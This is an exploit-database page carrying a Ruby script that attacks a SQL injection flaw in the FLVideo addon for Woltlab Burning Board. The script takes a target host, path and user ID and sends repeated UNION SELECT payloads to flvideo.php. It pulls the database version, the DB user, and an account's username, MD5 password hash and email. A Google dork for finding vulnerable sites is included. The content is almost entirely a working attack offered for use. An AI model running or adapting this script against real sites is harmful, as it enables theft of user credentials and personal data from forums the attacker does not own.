Woltlab Burning Board FLVideo SQL Injection

2013.09.07
Credit: Easy Laster
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-89

# Exploit Title: Woltlab Burning Board FLVideo Addon SQL Injection flvideo.php Exploit # Google Dork: inurl:flvideo.php wbb (and more) # Date: 04.09.2013 # Exploit Author: Easy Laster # Vendor Homepage: http://www.flvideo.de/ # Version: FLVideo Addon for WBB ? 2007 by Danny Knig # Tested on: Windows8/Backtrack #!/usr/bin/ruby #secunet.cc #19.02.2013 #Discovered and Vulnerability by Easy Laster #flvideo.php?action=search&for=cat&value=999999.9/**/+union/**/+all/* #*/+select/**/+concat(0x7e,0x27,unhex(Hex(cast(version()%20as%20char)) #null,null,null,null,null,null,null/**/+from/**/+bb1_users/**/+where/ #**/+userid=1--+ print " ################################################################ # secunet.cc # ################################################################ #PRIVAT!PRIVAT!PRIVAT!PRIVAT!PRIVAT!PRIVAT!PRIVAT!PRIVAT!PRIVAT# #Woltlab Burning Board FLVideo Addon SQL Injection flvideo.php # # Exploit # # Using Host+Path+id # # www.demo.de + /wbb/ + or + / + 1 # # Easy Laster # #PRIVAT!PRIVAT!PRIVAT!PRIVAT!PRIVAT!PRIVAT!PRIVAT!PRIVAT!PRIVAT# ################################################################ " require 'net/http' block = "################################################################" print ""+ block +"" print "\nEnter Target Name (site.com)->" host=gets.chomp print ""+ block +"" print "\nEnter Script Path (/wbb/ or /)->" path=gets.chomp print ""+ block +"" print "\nEnter The ID From User (id)->" userid=gets.chomp print ""+ block +"" begin dir = "flvideo.php?action=search&for=cat&value=999999.9/**/+union/**/+all/*"+ "*/+select/**/+concat(0x7e,0x27,unhex(Hex(cast(version()%20as%20char))"+ "),0x27,0x7e),null,null,null,null,null,null,null,null,null,null,null,"+ "null,null,null,null,null,null,null/**/+from/**/+bb1_users/**/+where/"+ "**/+userid="+ userid +"--+" http = Net::HTTP.new(host, 80) resp= http.get(path+dir) print "\nVersion Database -> "+(/'~'(.+)'~'/).match(resp.body)[1] dir = "flvideo.php?action=search&for=cat&value=999999.9/**/+union/**/+all/*"+ "*/+select/**/+concat(0x7e,0x27,unhex(Hex(cast(user()%20as%20char))"+ "),0x27,0x7e),null,null,null,null,null,null,null,null,null,null,null,"+ "null,null,null,null,null,null,null/**/+from/**/+bb1_users/**/+where/"+ "**/+userid="+ userid +"--+" http = Net::HTTP.new(host, 80) resp= http.get(path+dir) print "\nDatabase User -> "+(/'~'(.+)'~'/).match(resp.body)[1] dir = "flvideo.php?action=search&for=cat&value=999999.9/**/+union/**/+all/*"+ "*/+select/**/+concat(0x7e,0x27,unhex(Hex(cast(userid%20as%20char))"+ "),0x27,0x7e),null,null,null,null,null,null,null,null,null,null,null,"+ "null,null,null,null,null,null,null/**/+from/**/+bb1_users/**/+where/"+ "**/+userid="+ userid +"--+" http = Net::HTTP.new(host, 80) resp= http.get(path+dir) print "\nID Account -> "+(/'~'(.+)'~'/).match(resp.body)[1] dir = "flvideo.php?action=search&for=cat&value=999999.9/**/+union/**/+all/*"+ "*/+select/**/+concat(0x7e,0x27,unhex(Hex(cast(username%20as%20char))"+ "),0x27,0x7e),null,null,null,null,null,null,null,null,null,null,null,"+ "null,null,null,null,null,null,null/**/+from/**/+bb1_users/**/+where/"+ "**/+userid="+ userid +"--+" http = Net::HTTP.new(host, 80) resp= http.get(path+dir) print "\nUsername Account -> "+(/'~'(.+)'~'/).match(resp.body)[1] dir = "flvideo.php?action=search&for=cat&value=999999.9/**/+union/**/+all/*"+ "*/+select/**/+concat(0x7e,0x27,unhex(Hex(cast(password%20as%20char))"+ "),0x27,0x7e),null,null,null,null,null,null,null,null,null,null,null,"+ "null,null,null,null,null,null,null/**/+from/**/+bb1_users/**/+where/"+ "**/+userid="+ userid +"--+" http = Net::HTTP.new(host, 80) resp= http.get(path+dir) print "\nPassword Account MD5 -> "+(/'~'(.+)'~'/).match(resp.body)[1] dir = "flvideo.php?action=search&for=cat&value=999999.9/**/+union/**/+all/*"+ "*/+select/**/+concat(0x7e,0x27,unhex(Hex(cast(email%20as%20char))"+ "),0x27,0x7e),null,null,null,null,null,null,null,null,null,null,null,"+ "null,null,null,null,null,null,null/**/+from/**/+bb1_users/**/+where/"+ "**/+userid="+ userid +"--+" http = Net::HTTP.new(host, 80) resp= http.get(path+dir) print "\nEmail Adresse Account -> "+(/'~'(.+)'~'/).match(resp.body)[1] print "\n" print ""+ block +"" print "\n" print " ################################################################ # Greetings # ################################################################ #mAdDiN, c0Re, illuministrator, WD40, peak, IRET, GabbaGandalf # #DR.zydz, HANN!BAL, 6rbk9 , Manifest, doc, cr4ck, Prof.Dr. Ogen# #ezah, enco, 4c!d And SecuNet.cc, 4004, dc3 crew, hackbase.cc # ################################################################ " rescue print "\nExploit Failed" end


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2019, cxsecurity.com

 

Back to Top